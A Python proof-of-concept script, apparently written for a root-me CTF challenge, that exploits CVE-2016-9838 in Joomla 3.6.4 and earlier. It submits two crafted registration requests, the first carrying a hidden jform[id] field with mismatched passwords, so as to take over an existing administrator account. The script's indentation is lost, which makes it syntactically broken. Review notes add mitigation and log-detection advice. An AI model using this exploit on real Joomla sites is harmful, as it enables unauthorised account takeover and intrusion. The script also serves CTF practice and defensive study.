#!/usr/bin/python3
# CVE-2016-9838: Joomla! <= 3.6.4 Admin TakeOver
# cf
# Source: https://www.ambionics.io/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution
"""Proof of concept for CVE-2016-9838 (Joomla! account takeover), as pasted.

What the script does, read from the code below: it submits the public
user-registration form twice inside one HTTP session. The first submission
carries an extra ``jform[id]`` field naming an existing user id plus
deliberately mismatched passwords, so it is rejected; the second submission
drops ``jform[id]``, repairs the passwords, and is expected to modify the
user named by the first submission rather than create a new account.

Mitigation: upgrade any Joomla! install in the affected range stated above
(<= 3.6.4). Detection: the genuine registration form scraped below does not
contain an ``id`` input, so a registration POST carrying ``jform[id]`` is a
useful indicator in web-server or WAF logs.

NOTE(review): the paste stripped all indentation. ``print(i)`` at column 0
directly after ``for i in range(1,100):`` is a SyntaxError, and this copy
does not show how much of the script below was originally inside that loop.
The layout is reproduced as pasted; treat it as lost, not authoritative.
"""

import bs4       # third-party (beautifulsoup4)
import requests  # third-party
import random


ADMIN_ID = 384  # user id placed in jform[id] on the first request
url = 'http://ctf03.root-me.org/9cc241ad23332e598db0f9d52ced5850/'  # root-me CTF challenge instance

form_url = url + 'index.php/component/users/?view=registration'
action_url = url + 'index.php/component/users/?task=registration.register'
# random.randrange only needs to avoid name collisions here; it is not
# a cryptographic RNG and is not being used as one.
username = 'user%d' % random.randrange(1000, 10000)
email = username + '@yopmail.com'
password = 'qwertyuiop'


for i in range(1,100):
print(i)  # NOTE(review): loop body extent unknown -- indentation lost in the paste

user_data = {
'name': username,
'username': username,
'password1': password,
'password2': password + 'XXXinvalid',  # deliberate mismatch so the first POST fails validation
'email1': email,
'email2': email,
'id': '%d' % ADMIN_ID  # the extra field the scraped form does not contain
}

# One Session object: both POSTs share its cookies, which the two-step
# sequence below appears to rely on (server-side state between requests).
session = requests.Session()

# Grab original data from the form, including the CSRF token

response = session.get(form_url)
soup = bs4.BeautifulSoup(response.text, 'lxml')  # requires the lxml parser to be installed

form = soup.find('form', id='member-registration')
# NOTE(review): this is None (AttributeError on find_all) if the form id is
# absent, and e['value'] raises KeyError for any <input> lacking a value
# attribute; no response status is checked before parsing.
data = {e['name']: e['value'] for e in form.find_all('input')}

# Build our modified data array

user_data = {'jform[%s]' % k: v for k, v in user_data.items()}  # prefix every key as jform[...]
data.update(user_data)  # overrides same-named scraped fields; CSRF token from the GET is kept

# First request will get denied because the two passwords are mismatched

response = session.post(action_url, data=data)  # response deliberately ignored

# The second will work

data['jform[password2]'] = data['jform[password1]']
del data['jform[id]']
response = session.post(action_url, data=data)

# NOTE(review): printed unconditionally -- neither POST's status or body is
# inspected, so this line does not prove the modification happened.
print("Account modified to user: %s [%s]" % (username, email))